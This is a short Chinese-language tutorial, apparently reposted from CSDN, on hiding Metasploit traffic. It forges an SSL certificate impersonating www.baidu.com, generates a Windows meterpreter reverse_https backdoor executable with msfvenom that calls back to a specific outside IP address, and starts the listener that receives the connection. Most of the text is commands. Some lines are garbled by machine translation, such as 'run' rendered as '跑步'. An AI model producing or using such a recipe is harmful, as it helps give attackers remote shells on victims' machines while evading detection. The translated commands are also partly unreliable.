免责声明: 本文仅供技术交流和学习之用.
目录
步骤:
1 – 使用openssl 生成证书
1-impersonate_ssl模块——生成证书
编辑
2.MSF生成绑定证书后门。
3.MSF监控上线。
证书伪造
加密https 流量
-解决了HTTPS-SSL通信证书被特征标记的问题
步骤:
1-利用 openssl 生成证书
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj \’/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com\’ -keyout www.baidu.com。 key -out www.baidu.com.crt cat www.baidu.com.key www.baidu.com.crt www.baidu.com.pem rm -f www.baidu.com.key www.baidu.com.crt
1-impersonate_ssl 模块 –生成证书
此外,Metasploit框架还有一个Auxiliary/gather/impersonate_ssl模块,可用于自动从可信来源创建假证书,这非常有用。
使用辅助/收集/impersonate_ssl
setRHOST www.baidu.com
跑步
—-.pem
2.MSF 生成绑定证书后门:
msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.236.117 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell
HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe
3.MSF 监听上线:
使用漏洞/多重/处理程序
负载设置windows/meterpreter/reverse_https
设置lhost 0.0.0.0
l 设置端口5566
设置HandlerSSLCert /root/www.baidu.com.pem
将StagerVerifySSLCert 设置为true
跑步
—可以通过访问https来查看证书。
证书伪造
https流量加密
以上有关#MSF的相关内容来源仅供您参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92118.html
